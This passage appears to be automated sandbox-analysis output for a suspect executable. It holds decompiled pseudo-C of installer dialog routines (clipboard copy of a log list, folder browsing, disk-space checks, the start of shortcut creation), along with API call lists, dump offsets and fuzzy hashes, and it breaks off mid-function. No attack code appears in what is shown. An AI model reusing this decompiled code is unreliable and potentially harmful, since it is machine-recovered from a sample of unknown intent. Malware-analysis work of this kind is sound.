                                                                                                                          				void* __esi;
                                                                                                                          				long _t87;
                                                                                                                          				unsigned int _t92;
                                                                                                                          				unsigned int _t93;
                                                                                                                          				int _t94;
                                                                                                                          				int _t95;
                                                                                                                          				long _t98;
                                                                                                                          				void* _t101;
                                                                                                                          				intOrPtr _t123;
                                                                                                                          				struct HWND__* _t127;
                                                                                                                          				int _t149;
                                                                                                                          				int _t150;
                                                                                                                          				struct HWND__* _t154;
                                                                                                                          				struct HWND__* _t158;
                                                                                                                          				struct HMENU__* _t160;
                                                                                                                          				long _t162;
                                                                                                                          				void* _t163;
                                                                                                                          				short* _t164;
                                                                                                                          
                                                                                                                          				_t154 =  *0x423664; // 0x0
                                                                                                                          				_t149 = 0;
                                                                                                                          				_v8 = _t154;
                                                                                                                          				if(_a8 != 0x110) {
                                                                                                                          					__eflags = _a8 - 0x405;
                                                                                                                          					if(_a8 == 0x405) {
                                                                                                                          						CloseHandle(CreateThread(0, 0, E00404E4D, GetDlgItem(_a4, 0x3ec), 0,  &_v12));
                                                                                                                          					}
                                                                                                                          					__eflags = _a8 - 0x111;
                                                                                                                          					if(_a8 != 0x111) {
                                                                                                                          						L17:
                                                                                                                          						__eflags = _a8 - 0x404;
                                                                                                                          						if(_a8 != 0x404) {
                                                                                                                          							L25:
                                                                                                                          							__eflags = _a8 - 0x7b;
                                                                                                                          							if(_a8 != 0x7b) {
                                                                                                                          								goto L20;
                                                                                                                          							}
                                                                                                                          							__eflags = _a12 - _t154;
                                                                                                                          							if(_a12 != _t154) {
                                                                                                                          								goto L20;
                                                                                                                          							}
                                                                                                                          							_t87 = SendMessageA(_t154, 0x1004, _t149, _t149);
                                                                                                                          							__eflags = _t87 - _t149;
                                                                                                                          							_a8 = _t87;
                                                                                                                          							if(_t87 <= _t149) {
                                                                                                                          								L37:
                                                                                                                          								return 0;
                                                                                                                          							}
                                                                                                                          							_t160 = CreatePopupMenu();
                                                                                                                          							AppendMenuA(_t160, _t149, 1, E004059FF(_t149, _t154, _t160, _t149, 0xffffffe1));
                                                                                                                          							_t92 = _a16;
                                                                                                                          							__eflags = _t92 - 0xffffffff;
                                                                                                                          							if(_t92 != 0xffffffff) {
                                                                                                                          								_t150 = _t92;
                                                                                                                          								_t93 = _t92 >> 0x10;
                                                                                                                          								__eflags = _t93;
                                                                                                                          								_t94 = _t93;
                                                                                                                          							} else {
                                                                                                                          								GetWindowRect(_t154,  &_v28);
                                                                                                                          								_t150 = _v28.left;
                                                                                                                          								_t94 = _v28.top;
                                                                                                                          							}
                                                                                                                          							_t95 = TrackPopupMenu(_t160, 0x180, _t150, _t94, _t149, _a4, _t149);
                                                                                                                          							_t162 = 1;
                                                                                                                          							__eflags = _t95 - 1;
                                                                                                                          							if(_t95 == 1) {
                                                                                                                          								_v60 = _t149;
                                                                                                                          								_v48 = 0x420478;
                                                                                                                          								_v44 = 0xfff;
                                                                                                                          								_a4 = _a8;
                                                                                                                          								do {
                                                                                                                          									_a4 = _a4 - 1;
                                                                                                                          									_t98 = SendMessageA(_v8, 0x102d, _a4,  &_v68);
                                                                                                                          									__eflags = _a4 - _t149;
                                                                                                                          									_t162 = _t162 + _t98 + 2;
                                                                                                                          								} while (_a4 != _t149);
                                                                                                                          								OpenClipboard(_t149);
                                                                                                                          								EmptyClipboard();
                                                                                                                          								_t101 = GlobalAlloc(0x42, _t162);
                                                                                                                          								_a4 = _t101;
                                                                                                                          								_t163 = GlobalLock(_t101);
                                                                                                                          								do {
                                                                                                                          									_v48 = _t163;
                                                                                                                          									_t164 = _t163 + SendMessageA(_v8, 0x102d, _t149,  &_v68);
                                                                                                                          									 *_t164 = 0xa0d;
                                                                                                                          									_t163 = _t164 + 2;
                                                                                                                          									_t149 = _t149 + 1;
                                                                                                                          									__eflags = _t149 - _a8;
                                                                                                                          								} while (_t149 < _a8);
                                                                                                                          								GlobalUnlock(_a4);
                                                                                                                          								SetClipboardData(1, _a4);
                                                                                                                          								CloseClipboard();
                                                                                                                          							}
                                                                                                                          							goto L37;
                                                                                                                          						}
                                                                                                                          						__eflags =  *0x42364c - _t149; // 0x0
                                                                                                                          						if(__eflags == 0) {
                                                                                                                          							ShowWindow( *0x423e88, 8);
                                                                                                                          							__eflags =  *0x423f0c - _t149; // 0x0
                                                                                                                          							if(__eflags == 0) {
                                                                                                                          								E00404D7B( *((intOrPtr*)( *0x41fc48 + 0x34)), _t149);
                                                                                                                          							}
                                                                                                                          							E00403D68(1);
                                                                                                                          							goto L25;
                                                                                                                          						}
                                                                                                                          						 *0x41f840 = 2;
                                                                                                                          						E00403D68(0x78);
                                                                                                                          						goto L20;
                                                                                                                          					} else {
                                                                                                                          						__eflags = _a12 - 0x403;
                                                                                                                          						if(_a12 != 0x403) {
                                                                                                                          							L20:
                                                                                                                          							return E00403DF6(_a8, _a12, _a16);
                                                                                                                          						}
                                                                                                                          						ShowWindow( *0x423650, _t149);
                                                                                                                          						ShowWindow(_t154, 8);
                                                                                                                          						E00403DC4(_t154);
                                                                                                                          						goto L17;
                                                                                                                          					}
                                                                                                                          				}
                                                                                                                          				_v52 = _v52 | 0xffffffff;
                                                                                                                          				_v40 = _v40 | 0xffffffff;
                                                                                                                          				_v60 = 2;
                                                                                                                          				_v56 = 0;
                                                                                                                          				_v48 = 0;
                                                                                                                          				_v44 = 0;
                                                                                                                          				asm("stosd");
                                                                                                                          				asm("stosd");
                                                                                                                          				_t123 =  *0x423e90; // 0x4868b0
                                                                                                                          				_a8 =  *((intOrPtr*)(_t123 + 0x5c));
                                                                                                                          				_a12 =  *((intOrPtr*)(_t123 + 0x60));
                                                                                                                          				 *0x423650 = GetDlgItem(_a4, 0x403);
                                                                                                                          				 *0x423648 = GetDlgItem(_a4, 0x3ee);
                                                                                                                          				_t127 = GetDlgItem(_a4, 0x3f8);
                                                                                                                          				 *0x423664 = _t127;
                                                                                                                          				_v8 = _t127;
                                                                                                                          				E00403DC4( *0x423650);
                                                                                                                          				 *0x423654 = E0040461D(4);
                                                                                                                          				 *0x42366c = 0;
                                                                                                                          				GetClientRect(_v8,  &_v28);
                                                                                                                          				_v52 = _v28.right - GetSystemMetrics(0x15);
                                                                                                                          				SendMessageA(_v8, 0x101b, 0,  &_v60);
                                                                                                                          				SendMessageA(_v8, 0x1036, 0x4000, 0x4000);
                                                                                                                          				if(_a8 >= 0) {
                                                                                                                          					SendMessageA(_v8, 0x1001, 0, _a8);
                                                                                                                          					SendMessageA(_v8, 0x1026, 0, _a8);
                                                                                                                          				}
                                                                                                                          				if(_a12 >= _t149) {
                                                                                                                          					SendMessageA(_v8, 0x1024, _t149, _a12);
                                                                                                                          				}
                                                                                                                          				_push( *((intOrPtr*)(_a16 + 0x30)));
                                                                                                                          				_push(0x1b);
                                                                                                                          				E00403D8F(_a4);
                                                                                                                          				if(( *0x423e98 & 0x00000003) != 0) {
                                                                                                                          					ShowWindow( *0x423650, _t149);
                                                                                                                          					if(( *0x423e98 & 0x00000002) != 0) {
                                                                                                                          						 *0x423650 = _t149;
                                                                                                                          					} else {
                                                                                                                          						ShowWindow(_v8, 8);
                                                                                                                          					}
                                                                                                                          					E00403DC4( *0x423648);
                                                                                                                          				}
                                                                                                                          				_t158 = GetDlgItem(_a4, 0x3ec);
                                                                                                                          				SendMessageA(_t158, 0x401, _t149, 0x75300000);
                                                                                                                          				if(( *0x423e98 & 0x00000004) != 0) {
                                                                                                                          					SendMessageA(_t158, 0x409, _t149, _a12);
                                                                                                                          					SendMessageA(_t158, 0x2001, _t149, _a8);
                                                                                                                          				}
                                                                                                                          				goto L37;
                                                                                                                          			}



































                                                                                                                          APIs
                                                                                                                          • GetDlgItem.USER32 ref: 00404F18
                                                                                                                          • GetDlgItem.USER32 ref: 00404F27
                                                                                                                          • GetClientRect.USER32 ref: 00404F64
                                                                                                                          • GetSystemMetrics.USER32 ref: 00404F6C
                                                                                                                          • SendMessageA.USER32(?,0000101B,00000000,00000002), ref: 00404F8D
                                                                                                                          • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 00404F9E
                                                                                                                          • SendMessageA.USER32(?,00001001,00000000,00000110), ref: 00404FB1
                                                                                                                          • SendMessageA.USER32(?,00001026,00000000,00000110), ref: 00404FBF
                                                                                                                          • SendMessageA.USER32(?,00001024,00000000,?), ref: 00404FD2
                                                                                                                          • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00404FF4
                                                                                                                          • ShowWindow.USER32(?,00000008), ref: 00405008
                                                                                                                          • GetDlgItem.USER32 ref: 00405029
                                                                                                                          • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 00405039
                                                                                                                          • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 00405052
                                                                                                                          • SendMessageA.USER32(00000000,00002001,00000000,00000110), ref: 0040505E
                                                                                                                          • GetDlgItem.USER32 ref: 00404F36
                                                                                                                            • Part of subcall function 00403DC4: SendMessageA.USER32(00000028,?,00000001,00403BF5), ref: 00403DD2
                                                                                                                          • GetDlgItem.USER32 ref: 0040507B
                                                                                                                          • CreateThread.KERNEL32 ref: 00405089
                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00405090
                                                                                                                          • ShowWindow.USER32(00000000), ref: 004050B4
                                                                                                                          • ShowWindow.USER32(00000000,00000008), ref: 004050B9
                                                                                                                          • ShowWindow.USER32(00000008), ref: 00405100
                                                                                                                          • SendMessageA.USER32(00000000,00001004,00000000,00000000), ref: 00405132
                                                                                                                          • CreatePopupMenu.USER32 ref: 00405143
                                                                                                                          • AppendMenuA.USER32 ref: 00405158
                                                                                                                          • GetWindowRect.USER32 ref: 0040516B
                                                                                                                          • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 0040518F
                                                                                                                          • SendMessageA.USER32(?,0000102D,00000000,?), ref: 004051CA
                                                                                                                          • OpenClipboard.USER32(00000000), ref: 004051DA
                                                                                                                          • EmptyClipboard.USER32(?,?,00000000,?,00000000), ref: 004051E0
                                                                                                                          • GlobalAlloc.KERNEL32(00000042,?,?,?,00000000,?,00000000), ref: 004051E9
                                                                                                                          • GlobalLock.KERNEL32 ref: 004051F3
                                                                                                                          • SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405207
                                                                                                                          • GlobalUnlock.KERNEL32(00000000,?,?,00000000,?,00000000), ref: 0040521F
                                                                                                                          • SetClipboardData.USER32 ref: 0040522A
                                                                                                                          • CloseClipboard.USER32 ref: 00405230
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.335736473.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000002.00000002.335724114.0000000000400000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335749978.0000000000407000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335758150.0000000000409000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335774251.0000000000422000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335781240.0000000000429000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335787934.000000000042C000.00000002.00020000.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                                                          • String ID: {
                                                                                                                          • API String ID: 590372296-366298937
                                                                                                                          • Opcode ID: 001334b4ba3c222cf79d50ec4f04ffad4c31a43647bbcf3abe0fe5947dea7136
                                                                                                                          • Instruction ID: d8c2bf4a41f8d47596d7e212a196e63f96e24a60825c263716f9721a4c55cacb
                                                                                                                          • Opcode Fuzzy Hash: 001334b4ba3c222cf79d50ec4f04ffad4c31a43647bbcf3abe0fe5947dea7136
                                                                                                                          • Instruction Fuzzy Hash: 99A13A71900208BFDB219F60DD89EAE7F79FB04355F00817AFA04BA2A0C7799A51DF59
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 78%
                                                                                                                          			E004041CD(struct HWND__* _a4, signed int _a8, unsigned int _a12, intOrPtr _a16) {
                                                                                                                          				signed int _v8;
                                                                                                                          				struct HWND__* _v12;
                                                                                                                          				long _v16;
                                                                                                                          				long _v20;
                                                                                                                          				char _v24;
                                                                                                                          				long _v28;
                                                                                                                          				char _v32;
                                                                                                                          				intOrPtr _v36;
                                                                                                                          				long _v40;
                                                                                                                          				signed int _v44;
                                                                                                                          				CHAR* _v52;
                                                                                                                          				intOrPtr _v56;
                                                                                                                          				intOrPtr _v60;
                                                                                                                          				intOrPtr _v64;
                                                                                                                          				CHAR* _v68;
                                                                                                                          				void _v72;
                                                                                                                          				char _v76;
                                                                                                                          				void* __ebx;
                                                                                                                          				void* __edi;
                                                                                                                          				void* __esi;
                                                                                                                          				intOrPtr _t81;
                                                                                                                          				long _t86;
                                                                                                                          				signed char* _t88;
                                                                                                                          				void* _t94;
                                                                                                                          				signed int _t95;
                                                                                                                          				signed short _t113;
                                                                                                                          				signed int _t117;
                                                                                                                          				char* _t122;
                                                                                                                          				intOrPtr _t124;
                                                                                                                          				intOrPtr* _t138;
                                                                                                                          				signed int* _t145;
                                                                                                                          				intOrPtr _t147;
                                                                                                                          				signed int _t148;
                                                                                                                          				signed int _t153;
                                                                                                                          				struct HWND__* _t159;
                                                                                                                          				CHAR* _t162;
                                                                                                                          				int _t163;
                                                                                                                          
                                                                                                                          				_t81 =  *0x41fc48;
                                                                                                                          				_v36 = _t81;
                                                                                                                          				_t162 = ( *(_t81 + 0x3c) << 0xa) + 0x424000;
                                                                                                                          				_v8 =  *((intOrPtr*)(_t81 + 0x38));
                                                                                                                          				if(_a8 == 0x40b) {
                                                                                                                          					E00405282(0x3fb, _t162);
                                                                                                                          					E00405C3F(_t162);
                                                                                                                          				}
                                                                                                                          				if(_a8 != 0x110) {
                                                                                                                          					L8:
                                                                                                                          					if(_a8 != 0x111) {
                                                                                                                          						L20:
                                                                                                                          						if(_a8 == 0x40f) {
                                                                                                                          							L22:
                                                                                                                          							_v8 = _v8 & 0x00000000;
                                                                                                                          							_v12 = _v12 & 0x00000000;
                                                                                                                          							E00405282(0x3fb, _t162);
                                                                                                                          							if(E004055B1(_t180, _t162) == 0) {
                                                                                                                          								_v8 = 1;
                                                                                                                          							}
                                                                                                                          							E004059DD(0x41f440, _t162);
                                                                                                                          							_t145 = 0;
                                                                                                                          							_t86 = E00405CFF(0);
                                                                                                                          							_v16 = _t86;
                                                                                                                          							if(_t86 == 0) {
                                                                                                                          								L31:
                                                                                                                          								E004059DD(0x41f440, _t162);
                                                                                                                          								_t88 = E00405564(0x41f440);
                                                                                                                          								if(_t88 != _t145) {
                                                                                                                          									 *_t88 =  *_t88 & 0x00000000;
                                                                                                                          								}
                                                                                                                          								if(GetDiskFreeSpaceA(0x41f440,  &_v20,  &_v28,  &_v16,  &_v40) == 0) {
                                                                                                                          									_t153 = _a8;
                                                                                                                          									goto L37;
                                                                                                                          								} else {
                                                                                                                          									_t163 = 0x400;
                                                                                                                          									_t153 = MulDiv(_v20 * _v28, _v16, 0x400);
                                                                                                                          									_v12 = 1;
                                                                                                                          									goto L38;
                                                                                                                          								}
                                                                                                                          							} else {
                                                                                                                          								if(0 == 0x41f440) {
                                                                                                                          									L30:
                                                                                                                          									_t145 = 0;
                                                                                                                          									goto L31;
                                                                                                                          								} else {
                                                                                                                          									goto L26;
                                                                                                                          								}
                                                                                                                          								while(1) {
                                                                                                                          									L26:
                                                                                                                          									_t113 = _v16(0x41f440,  &_v44,  &_v24,  &_v32);
                                                                                                                          									if(_t113 != 0) {
                                                                                                                          										break;
                                                                                                                          									}
                                                                                                                          									if(_t145 != 0) {
                                                                                                                          										 *_t145 =  *_t145 & _t113;
                                                                                                                          									}
                                                                                                                          									_t145 = E00405517(0x41f440) - 1;
                                                                                                                          									 *_t145 = 0x5c;
                                                                                                                          									if(_t145 != 0x41f440) {
                                                                                                                          										continue;
                                                                                                                          									} else {
                                                                                                                          										goto L30;
                                                                                                                          									}
                                                                                                                          								}
                                                                                                                          								_t153 = (_v40 << 0x00000020 | _v44) >> 0xa;
                                                                                                                          								_v12 = 1;
                                                                                                                          								_t145 = 0;
                                                                                                                          								L37:
                                                                                                                          								_t163 = 0x400;
                                                                                                                          								L38:
                                                                                                                          								_t94 = E0040461D(5);
                                                                                                                          								if(_v12 != _t145 && _t153 < _t94) {
                                                                                                                          									_v8 = 2;
                                                                                                                          								}
                                                                                                                          								_t147 =  *0x42365c; // 0x48b9e6
                                                                                                                          								if( *((intOrPtr*)(_t147 + 0x10)) != _t145) {
                                                                                                                          									E00404568(0x3ff, 0xfffffffb, _t94);
                                                                                                                          									if(_v12 == _t145) {
                                                                                                                          										SetDlgItemTextA(_a4, _t163, 0x41f430);
                                                                                                                          									} else {
                                                                                                                          										E00404568(_t163, 0xfffffffc, _t153);
                                                                                                                          									}
                                                                                                                          								}
                                                                                                                          								_t95 = _v8;
                                                                                                                          								 *0x423f24 = _t95;
                                                                                                                          								if(_t95 == _t145) {
                                                                                                                          									_v8 = E0040140B(7);
                                                                                                                          								}
                                                                                                                          								if(( *(_v36 + 0x14) & _t163) != 0) {
                                                                                                                          									_v8 = _t145;
                                                                                                                          								}
                                                                                                                          								E00403DB1(0 | _v8 == _t145);
                                                                                                                          								if(_v8 == _t145 &&  *0x420464 == _t145) {
                                                                                                                          									E00404162();
                                                                                                                          								}
                                                                                                                          								 *0x420464 = _t145;
                                                                                                                          								goto L53;
                                                                                                                          							}
                                                                                                                          						}
                                                                                                                          						_t180 = _a8 - 0x405;
                                                                                                                          						if(_a8 != 0x405) {
                                                                                                                          							goto L53;
                                                                                                                          						}
                                                                                                                          						goto L22;
                                                                                                                          					}
                                                                                                                          					_t117 = _a12 & 0x0000ffff;
                                                                                                                          					if(_t117 != 0x3fb) {
                                                                                                                          						L12:
                                                                                                                          						if(_t117 == 0x3e9) {
                                                                                                                          							_t148 = 7;
                                                                                                                          							memset( &_v72, 0, _t148 << 2);
                                                                                                                          							_v76 = _a4;
                                                                                                                          							_v68 = 0x420478;
                                                                                                                          							_v56 = E00404502;
                                                                                                                          							_v52 = _t162;
                                                                                                                          							_v64 = E004059FF(0x3fb, 0x420478, _t162, 0x41f848, _v8);
                                                                                                                          							_t122 =  &_v76;
                                                                                                                          							_v60 = 0x41;
                                                                                                                          							__imp__SHBrowseForFolderA(_t122);
                                                                                                                          							if(_t122 == 0) {
                                                                                                                          								_a8 = 0x40f;
                                                                                                                          							} else {
                                                                                                                          								__imp__CoTaskMemFree(_t122);
                                                                                                                          								E004054D0(_t162);
                                                                                                                          								_t124 =  *0x423e90; // 0x4868b0
                                                                                                                          								_t125 =  *((intOrPtr*)(_t124 + 0x11c));
                                                                                                                          								if( *((intOrPtr*)(_t124 + 0x11c)) != 0 && _t162 == "C:\\Users\\engineer\\AppData\\Local\\Temp") {
                                                                                                                          									E004059FF(0x3fb, 0x420478, _t162, 0, _t125);
                                                                                                                          									if(lstrcmpiA(0x422e20, 0x420478) != 0) {
                                                                                                                          										lstrcatA(_t162, 0x422e20);
                                                                                                                          									}
                                                                                                                          								}
                                                                                                                          								 *0x420464 =  &(( *0x420464)[0]);
                                                                                                                          								SetDlgItemTextA(_a4, 0x3fb, _t162);
                                                                                                                          							}
                                                                                                                          						}
                                                                                                                          						goto L20;
                                                                                                                          					}
                                                                                                                          					if(_a12 >> 0x10 != 0x300) {
                                                                                                                          						goto L53;
                                                                                                                          					}
                                                                                                                          					_a8 = 0x40f;
                                                                                                                          					goto L12;
                                                                                                                          				} else {
                                                                                                                          					_t159 = _a4;
                                                                                                                          					_v12 = GetDlgItem(_t159, 0x3fb);
                                                                                                                          					if(E0040553D(_t162) != 0 && E00405564(_t162) == 0) {
                                                                                                                          						E004054D0(_t162);
                                                                                                                          					}
                                                                                                                          					 *0x423658 = _t159;
                                                                                                                          					SetWindowTextA(_v12, _t162);
                                                                                                                          					_push( *((intOrPtr*)(_a16 + 0x34)));
                                                                                                                          					_push(1);
                                                                                                                          					E00403D8F(_t159);
                                                                                                                          					_push( *((intOrPtr*)(_a16 + 0x30)));
                                                                                                                          					_push(0x14);
                                                                                                                          					E00403D8F(_t159);
                                                                                                                          					E00403DC4(_v12);
                                                                                                                          					_t138 = E00405CFF(7);
                                                                                                                          					if(_t138 == 0) {
                                                                                                                          						L53:
                                                                                                                          						return E00403DF6(_a8, _a12, _a16);
                                                                                                                          					}
                                                                                                                          					 *_t138(_v12, 1);
                                                                                                                          					goto L8;
                                                                                                                          				}
                                                                                                                          			}








































                                                                                                                          0x004043c6
                                                                                                                          0x004043cb
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004043cf
                                                                                                                          0x004043d1
                                                                                                                          0x004043d1
                                                                                                                          0x004043dc
                                                                                                                          0x004043df
                                                                                                                          0x004043e4
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004043e4
                                                                                                                          0x0040443f
                                                                                                                          0x00404446
                                                                                                                          0x0040444d
                                                                                                                          0x00404454
                                                                                                                          0x00404454
                                                                                                                          0x00404459
                                                                                                                          0x0040445b
                                                                                                                          0x00404463
                                                                                                                          0x00404469
                                                                                                                          0x00404469
                                                                                                                          0x00404470
                                                                                                                          0x00404479
                                                                                                                          0x00404483
                                                                                                                          0x0040448b
                                                                                                                          0x004044a1
                                                                                                                          0x0040448d
                                                                                                                          0x00404491
                                                                                                                          0x00404491
                                                                                                                          0x0040448b
                                                                                                                          0x004044a6
                                                                                                                          0x004044ab
                                                                                                                          0x004044b0
                                                                                                                          0x004044b9
                                                                                                                          0x004044b9
                                                                                                                          0x004044c2
                                                                                                                          0x004044c4
                                                                                                                          0x004044c4
                                                                                                                          0x004044d0
                                                                                                                          0x004044d8
                                                                                                                          0x004044e2
                                                                                                                          0x004044e2
                                                                                                                          0x004044e7
                                                                                                                          0x00000000
                                                                                                                          0x004044e7
                                                                                                                          0x004043b1
                                                                                                                          0x0040436b
                                                                                                                          0x00404372
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00404372
                                                                                                                          0x00404293
                                                                                                                          0x00404299
                                                                                                                          0x004042b3
                                                                                                                          0x004042b8
                                                                                                                          0x004042c2
                                                                                                                          0x004042c9
                                                                                                                          0x004042d8
                                                                                                                          0x004042db
                                                                                                                          0x004042de
                                                                                                                          0x004042e5
                                                                                                                          0x004042ed
                                                                                                                          0x004042f0
                                                                                                                          0x004042f4
                                                                                                                          0x004042fb
                                                                                                                          0x00404303
                                                                                                                          0x0040435b
                                                                                                                          0x00404305
                                                                                                                          0x00404306
                                                                                                                          0x0040430d
                                                                                                                          0x00404312
                                                                                                                          0x00404317
                                                                                                                          0x0040431f
                                                                                                                          0x0040432c
                                                                                                                          0x00404340
                                                                                                                          0x00404344
                                                                                                                          0x00404344
                                                                                                                          0x00404340
                                                                                                                          0x00404349
                                                                                                                          0x00404354
                                                                                                                          0x00404354
                                                                                                                          0x00404303
                                                                                                                          0x00000000
                                                                                                                          0x004042b8
                                                                                                                          0x004042a6
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004042ac
                                                                                                                          0x00000000
                                                                                                                          0x00404214
                                                                                                                          0x00404214
                                                                                                                          0x00404220
                                                                                                                          0x0040422a
                                                                                                                          0x00404237
                                                                                                                          0x00404237
                                                                                                                          0x0040423d
                                                                                                                          0x00404246
                                                                                                                          0x0040424f
                                                                                                                          0x00404252
                                                                                                                          0x00404255
                                                                                                                          0x0040425d
                                                                                                                          0x00404260
                                                                                                                          0x00404263
                                                                                                                          0x0040426b
                                                                                                                          0x00404272
                                                                                                                          0x00404279
                                                                                                                          0x004044ed
                                                                                                                          0x004044ff
                                                                                                                          0x004044ff
                                                                                                                          0x00404284
                                                                                                                          0x00000000
                                                                                                                          0x00404284

                                                                                                                          APIs
                                                                                                                          • GetDlgItem.USER32 ref: 00404219
                                                                                                                          • SetWindowTextA.USER32(?,?), ref: 00404246
                                                                                                                          • SHBrowseForFolderA.SHELL32(?,0041F848,?), ref: 004042FB
                                                                                                                          • CoTaskMemFree.OLE32(00000000), ref: 00404306
                                                                                                                          • lstrcmpiA.KERNEL32(Call,00420478,00000000,?,?), ref: 00404338
                                                                                                                          • lstrcatA.KERNEL32(?,Call), ref: 00404344
                                                                                                                          • SetDlgItemTextA.USER32 ref: 00404354
                                                                                                                            • Part of subcall function 00405282: GetDlgItemTextA.USER32 ref: 00405295
                                                                                                                            • Part of subcall function 00405C3F: CharNextA.USER32(?,*?|<>/":,00000000,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004030A3,C:\Users\user\AppData\Local\Temp\,00000000,00403215), ref: 00405C97
                                                                                                                            • Part of subcall function 00405C3F: CharNextA.USER32(?,?,?,00000000), ref: 00405CA4
                                                                                                                            • Part of subcall function 00405C3F: CharNextA.USER32(?,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004030A3,C:\Users\user\AppData\Local\Temp\,00000000,00403215), ref: 00405CA9
                                                                                                                            • Part of subcall function 00405C3F: CharPrevA.USER32(?,?,"C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004030A3,C:\Users\user\AppData\Local\Temp\,00000000,00403215), ref: 00405CB9
                                                                                                                          • GetDiskFreeSpaceA.KERNEL32(0041F440,?,?,0000040F,?,0041F440,0041F440,?,00000000,0041F440,?,?,000003FB,?), ref: 0040440D
                                                                                                                          • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404428
                                                                                                                          • SetDlgItemTextA.USER32 ref: 004044A1
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.335736473.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000002.00000002.335724114.0000000000400000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335749978.0000000000407000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335758150.0000000000409000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335774251.0000000000422000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335781240.0000000000429000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000002.00000002.335787934.000000000042C000.00000002.00020000.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpi
                                                                                                                          • String ID: A$C:\Users\user\AppData\Local\Temp$Call
                                                                                                                          • API String ID: 2246997448-1655598669
                                                                                                                          • Opcode ID: 6e673fc6d151b24e91dad944200417fa3a5a6dedc4a92dfa1b187ab04de59240
                                                                                                                          • Instruction ID: b374e158efdd7287bf49babe660ec8015a33fdd664c905072b33ae798ddb7db4
                                                                                                                          • Opcode Fuzzy Hash: 6e673fc6d151b24e91dad944200417fa3a5a6dedc4a92dfa1b187ab04de59240
                                                                                                                          • Instruction Fuzzy Hash: 4C9175B1A00219ABDF11AFA1CC84AAF7AB8EF44354F10407BFA04B62D1D77C9A41DB59
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 74%
                                                                                                                          			E00402020() {
                                                                                                                          				void* _t44;
                                                                                                                          				intOrPtr* _t48;
                                                                                                                          				intOrPtr* _t50;
                                                                                                                          				intOrPtr* _t52;
                                                                                                                          				intOrPtr* _t54;
                                                                                                                          				signed int _t58;
                                                                                                                          				intOrPtr* _t59;
                                                                                                                          				intOrPtr* _t62;
                                                                                                                          				intOrPtr* _t64;
                                                                                                                          				intOrPtr* _t66;
                                                                                                                          				intOrPtr* _t69;
                                                                                                                          				intOrPtr* _t71;
                                                                                                                          				int _t75;
                                                                                                                          				signed int _t81;
                                                                                                                          				intOrPtr* _t88;
                                                                                                                          				void* _t95;
                                                                                                                          				void* _t96;
                                                                                                                          				void* _t100;
                                                                                                                          
                                                                                                                          				 *(_t100 - 0x30) = E004029F6(0xfffffff0);
                                                                                                                          				_t96 = E004029F6(0xffffffdf);
                                                                                                                          				 *((intOrPtr*)(_t100 - 0x2c)) = E004029F6(2);
                                                                                                                          				 *((intOrPtr*)(_t100 - 8)) = E004029F6(0xffffffcd);
                                                                                                                          				 *((intOrPtr*)(_t100 - 0x44)) = E004029F6(0x45);
                                                                                                                          				if(E0040553D(_t96) == 0) {
                                                                                                                          					E004029F6(0x21);
                                                                                                                          				}
                                                                                                                          				_t44 = _t100 + 8;
                                                                                                                          				__imp__CoCreateInstance(0x407384, _t75, 1, 0x407374, _t44);
                                                                                                                          				if(_t44 < _t75) {
                                                                                                                          					L13:
                                                                                                                          					 *((intOrPtr*)(_t100 - 4)) = 1;
                                                                                                                          					_push(0xfffffff0);
                                                                                                                          				} else {
                                                                                                                          					_t48 =  *((intOrPtr*)(_t100 + 8));
                                                                                                                          					_t95 =  *((intOrPtr*)( *_t48))(_t48, 0x407394, _t100 - 0x34);
                                                                                                                          					if(_t95 >= _t75) {
                                                                                                                          						_t52 =  *((intOrPtr*)(_t100 + 8));
                                                                                                                          						_t95 =  *((intOrPtr*)( *_t52 + 0x50))(_t52, _t96);
                                                                                                                          						_t54 =  *((intOrPtr*)(_t100 + 8));
